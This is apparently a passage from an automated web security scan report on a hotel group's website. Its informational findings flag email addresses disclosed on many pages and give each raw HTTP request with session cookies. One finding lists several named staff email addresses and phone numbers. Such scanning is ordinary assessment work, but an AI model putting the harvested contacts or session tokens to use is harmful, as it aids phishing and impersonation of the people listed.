Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.44. http://www.redcarnationhotels.com/lloydstsb/terms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /lloydstsb/terms

Issue detail

The following email address was disclosed in the response:

Request

GET /lloydstsb/terms HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:00:16 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:00:16 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Terms and Conditions</title>
<m
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.45. http://www.redcarnationhotels.com/london-offers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /london-offers

Issue detail

The following email address was disclosed in the response:

Request

GET /london-offers HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=147d0afef57869fb6da0dff7153a443c;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:38:21 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:38:21 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=767728f27962f5cd7261ee9a66948e93; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury London Hotel Deals & Off
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.46. http://www.redcarnationhotels.com/london-offers/terms-conditions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /london-offers/terms-conditions

Issue detail

The following email address was disclosed in the response:

Request

GET /london-offers/terms-conditions HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/london-offers
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:57:27 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:57:27 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Terms and Conditions</title>
<m
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.47. http://www.redcarnationhotels.com/london_theatre_break  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /london_theatre_break

Issue detail

The following email address was disclosed in the response:

Request

GET /london_theatre_break HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:23 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:23 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>London Theatre Breaks, Hotel &
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.48. http://www.redcarnationhotels.com/london_weekend_break  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /london_weekend_break

Issue detail

The following email address was disclosed in the response:

Request

GET /london_weekend_break HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:27 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:27 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>London Weekend Breaks, Luxury H
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.49. http://www.redcarnationhotels.com/meet-the-team  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /meet-the-team

Issue detail

The following email addresses were disclosed in the response:

Request

GET /meet-the-team HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:23:37 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:23:37 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=6b9511053bb709f5070e1fc1a78631e6; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Meet the Group Team - Luxury Ho
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;jonathan@rchmail.com&nbsp;&nbsp;&nbsp; T: 0207 514 5633</p>
...[SNIP]...
<br />
tholmes@rchmail.com&nbsp;&nbsp;&nbsp;&nbsp; T: 0207 958 6923</p>
...[SNIP]...
<p>davideck@rchmail.com&nbsp;&nbsp;&nbsp;&nbsp; T: 0207 514 5607</p>
...[SNIP]...
<p>akendall@rchmail.com&nbsp;&nbsp;&nbsp; T: +1 5616592174</p>
...[SNIP]...
<p>phemmings@rchmail.com&nbsp;&nbsp;&nbsp; T: 0207 958 6941</p>
...[SNIP]...
<p>lmcgivern@rchmail.com&nbsp;&nbsp;&nbsp; T: 0207 963 0783</p>
...[SNIP]...
<p>sdovey@rchmail.com&nbsp;&nbsp;&nbsp; T: 0207 612 8460</p>
...[SNIP]...
6.50. http://www.redcarnationhotels.com/meet-the-team/terry-holmes  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /meet-the-team/terry-holmes

Issue detail

The following email address was disclosed in the response:

Request

GET /meet-the-team/terry-holmes HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://webcache.googleusercontent.com/search?q=cache:M_vK81JO5OUJ:www.milestonehotel.com/meet-the-team+%40rchmail.com&cd=6&hl=en&ct=clnk&gl=us
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:44:50 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:44:50 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Terry Holmes, Executive Directo
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.51. http://www.redcarnationhotels.com/meet-the-team/terry-holmes/career  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /meet-the-team/terry-holmes/career

Issue detail

The following email address was disclosed in the response:

Request

GET /meet-the-team/terry-holmes/career HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/meet-the-team/terry-holmes
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:44:51 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:44:51 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Terry Holmes, career in hotels<
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.52. http://www.redcarnationhotels.com/meetings-and-events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events

Issue detail

The following email address was disclosed in the response:

Request

GET /meetings-and-events HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/?business
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:44:57 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:44:57 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Business Hotels, Meeting
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.53. http://www.redcarnationhotels.com/meetings-and-events/executive-club  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events/executive-club

Issue detail

The following email address was disclosed in the response:

Request

GET /meetings-and-events/executive-club HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:44 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:44 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Executive Club - 5 Star London,
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.54. http://www.redcarnationhotels.com/meetings-and-events/executive-club/apply  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events/executive-club/apply

Issue detail

The following email address was disclosed in the response:

Request

GET /meetings-and-events/executive-club/apply HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:55 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:55 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Apply for Red Carnation Hotels
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.55. http://www.redcarnationhotels.com/meetings-and-events/executive-club/benefits  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events/executive-club/benefits

Issue detail

The following email address was disclosed in the response:

Request

GET /meetings-and-events/executive-club/benefits HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:44 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:44 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Benefits of Executive Club Memb
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.56. http://www.redcarnationhotels.com/meetings-and-events/facilities  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events/facilities

Issue detail

The following email address was disclosed in the response:

Request

GET /meetings-and-events/facilities HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:44 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:44 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Business Meetings Facilities -
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.57. http://www.redcarnationhotels.com/meetings-and-events/special-offers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /meetings-and-events/special-offers

Issue detail

The following email address was disclosed in the response:

Request

GET /meetings-and-events/special-offers HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:44 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:44 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Special Offers</title>
<meta ht
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.58. http://www.redcarnationhotels.com/newsletter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /newsletter

Issue detail

The following email address was disclosed in the response:

Request

GET /newsletter HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:59:11 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:59:11 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Newsletter</title>
<meta http-e
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.59. http://www.redcarnationhotels.com/offers-and-gifts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /offers-and-gifts

Issue detail

The following email address was disclosed in the response:

Request

GET /offers-and-gifts HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=dfc48a516e2595e48797f7ec699aad59;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:33:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:33:45 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=2b52beb91b1537662bbe83f4e05a93ac; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Weekend & Short Hotel Br
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.60. http://www.redcarnationhotels.com/offers-and-gifts/gift-vouchers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /offers-and-gifts/gift-vouchers

Issue detail

The following email address was disclosed in the response:

Request

GET /offers-and-gifts/gift-vouchers HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=dcf5c90f1a028d2043f3c5286a13bdf1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:36:29 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:36:29 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=953b91b9b59a23f915d0e39b7faa2a78; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Gift Experience Vouchers at The
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.61. http://www.redcarnationhotels.com/offers-and-gifts/gifts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /offers-and-gifts/gifts

Issue detail

The following email addresses were disclosed in the response:

Request

GET /offers-and-gifts/gifts HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/offers-and-gifts
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:36:50 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:36:50 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Gift Ideas - London, Cape Town,
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
